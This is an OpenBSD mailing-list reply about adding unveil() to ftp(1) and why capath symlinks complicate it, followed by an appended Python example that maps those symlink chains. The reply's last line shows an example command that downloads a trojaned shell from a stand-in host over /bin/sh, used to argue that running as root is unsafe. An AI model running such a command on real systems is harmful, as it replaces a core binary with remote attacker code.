Monday, June 01, 2020

Re: Could somebody please put unveil() in ftp(1)?

On 2020-05-30, Luke Small <lukensmall@gmail.com> wrote:
> I'll get to looking at ftp(1) more when I get some physical contact with my
> server. I'm quaranteaming with my girlfriend's folks.
>
> I have a pkg_ping program (OpenBSD-specific, dns caching, latency-timed,
> architecture and version specific mirror search; which doesn't download
> from OpenBSD.org/ftp.html anymore) that calls ftp to look up a random
> mirror's ftplist.

OK so (ignoring that I don't think pkg_ping is a good idea at all because
it increases the chances of getting packages out-of-sync with the base OS)
what you should do is call it with ftp -o - $URL and read on stdin.
That uses the best protection available in ftp now and I think that is
as good as you're reasonably going to get.

> I mentioned initially:
>
> It could take 3 lines at line 389 in /usr/src/usr.bin/ftp/main.c:
>
>         if (strcmp(outfile, "-"))
>                 if (unveil(outfile, "cw") == -1)
>                         err(1, "unveil");
>
> but it could look at several of the options like the cookie and certificate
> paths and such.

We went through this earlier when unveil was added to nc. The way capath
directories are often populated in the real world is not compatible with
unveil, you would need to resolve all files in capath, recursively resolve
symlinks, and add the chain of symlinks to the list of files to unveil.
Or remove capath support, or don't bother with unveil.

> I'd love to make it as safe to run as root as it is running it as an
> unprivileged chrooted user! And I love C!

It *cannot* be as safe to run as root as it is running it as an unprivileged
chrooted user. ftp -o /bin/sh http://dodgy.server/trojanned-sh
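The capath problem described in the reply above, as an added Python example that is not part of the thread: walk a capath directory, follow each symlink hop by hop, and collect every path that would need its own unveil(2) entry. The directory layout is constructed sample data, and the function and file names are assumptions; on OpenBSD each returned path would be handed to unveil(2) with "r".

```python
import os
import tempfile


def symlink_chain(path, max_hops=32):
    """Return path plus every symlink target traversed to reach the file.

    Each entry is a name the kernel looks up while resolving `path`, so
    under unveil(2) each one would need its own "r" entry.
    """
    chain = [path]
    while os.path.islink(chain[-1]):
        if len(chain) > max_hops:
            raise RuntimeError("symlink loop or too deep: %s" % path)
        target = os.readlink(chain[-1])
        if not os.path.isabs(target):
            # Relative targets resolve against the link's own directory.
            target = os.path.join(os.path.dirname(chain[-1]), target)
        chain.append(os.path.normpath(target))
    return chain


def unveil_set_for_capath(capath):
    """Every path that would have to be unveiled for a TLS client to read capath."""
    needed = {capath}
    for root, dirs, files in os.walk(capath):
        for name in dirs + files:
            needed.update(symlink_chain(os.path.join(root, name)))
    return needed


def build_demo_capath(base):
    """Constructed layout mimicking a package-managed CA store (sample data)."""
    os.makedirs(os.path.join(base, "capath"))
    os.makedirs(os.path.join(base, "store", "certs"))
    for rel in (("store", "certs", "real.pem"), ("capath", "local.pem")):
        with open(os.path.join(base, *rel), "w") as f:
            f.write("-----BEGIN CERTIFICATE-----\n(placeholder)\n")
    # capath/ca.pem -> ../store/ca-1.pem -> certs/real.pem
    os.symlink(os.path.join("certs", "real.pem"),
               os.path.join(base, "store", "ca-1.pem"))
    os.symlink(os.path.join("..", "store", "ca-1.pem"),
               os.path.join(base, "capath", "ca.pem"))


def demo():
    """Run on the constructed layout; return paths relative to the temp dir."""
    with tempfile.TemporaryDirectory() as base:
        build_demo_capath(base)
        found = unveil_set_for_capath(os.path.join(base, "capath"))
        return sorted(os.path.relpath(p, base) for p in found)


if __name__ == "__main__":
    for p in demo():
        print(p)
```

One two-hop symlink already turns a single capath entry into three paths outside the directory's own tree, which is the bookkeeping the reply says a real-world capath forces on unveil.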
